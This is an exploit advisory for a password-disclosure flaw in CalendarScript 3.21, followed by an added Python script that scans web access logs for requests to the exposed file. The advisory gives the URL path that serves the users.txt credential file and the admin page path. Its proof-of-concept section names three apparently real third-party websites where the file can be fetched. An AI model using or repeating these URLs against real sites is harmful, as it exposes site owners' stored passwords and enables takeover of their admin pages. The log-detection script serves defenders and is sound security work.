[+] Password Disclosure on CalendarScript 3.21
[+] Date: 28/04/2014
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://www.calendarscript.com/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: users.txt
[+] Version: 3.21
[+] Exploit: http://host/calendar/calendarscript/users.txt
[+] PoC:
    http://www.kcreggae.org/Calendar/calendarscript/users.txt
    http://fangmichael.com/cgi-bin/calendar/calendarscript/users.txt
    http://www.theoldironsides.com/calendar/calendarscript/users.txt
[+] Admin page: http://host/calendar/calendar_admin.pl
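
Added example, not part of the original advisory: a log check a site operator can run to see whether calendarscript/users.txt was actually served to a client, and whether the same client also requested calendar_admin.pl. The combined access-log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines in "combined" access-log format (not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [28/Apr/2014:10:01:02 +0000] "GET /calendar/calendarscript/users.txt HTTP/1.1" 200 312 "-" "curl/7.30"
198.51.100.7 - - [28/Apr/2014:10:01:09 +0000] "POST /calendar/calendar_admin.pl HTTP/1.1" 200 5120 "-" "curl/7.30"
203.0.113.9 - - [28/Apr/2014:10:05:00 +0000] "GET /cgi-bin/calendar/calendarscript/USERS.TXT?x=1 HTTP/1.1" 403 199 "-" "Mozilla/5.0"
203.0.113.20 - - [28/Apr/2014:10:06:00 +0000] "GET /Calendar/calendarscript/%75sers.txt HTTP/1.1" 200 312 "-" "Mozilla/5.0"
192.0.2.44 - - [28/Apr/2014:10:07:00 +0000] "GET /calendar/calendar.pl HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+)')
TARGET_RE = re.compile(r'/calendarscript/users\.txt$', re.IGNORECASE)

def find_users_txt_requests(log_text):
    """Return one dict per request whose path ends in calendarscript/users.txt."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, ts, _method, target, status, size = m.groups()
        # Drop the query string and decode %xx so encoded paths still match.
        path = unquote(urlsplit(target).path)
        if not TARGET_RE.search(path):
            continue
        # 200 with a non-empty body means the file content left the server.
        served = status == "200" and size.isdigit() and int(size) > 0
        hits.append({"ip": ip, "time": ts, "path": path,
                     "status": int(status), "disclosed": served})
    return hits

def ips_with_disclosure_and_admin_access(log_text):
    """Clients that were served users.txt and also requested calendar_admin.pl."""
    leaked_to = {h["ip"] for h in find_users_txt_requests(log_text) if h["disclosed"]}
    admins = set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and m.group(1) in leaked_to and "calendar_admin.pl" in m.group(4):
            admins.add(m.group(1))
    return sorted(admins)
```

Any hit with "disclosed" set means the stored credentials should be treated as exposed and rotated; a 403 or 404 on the same path shows the file is no longer served.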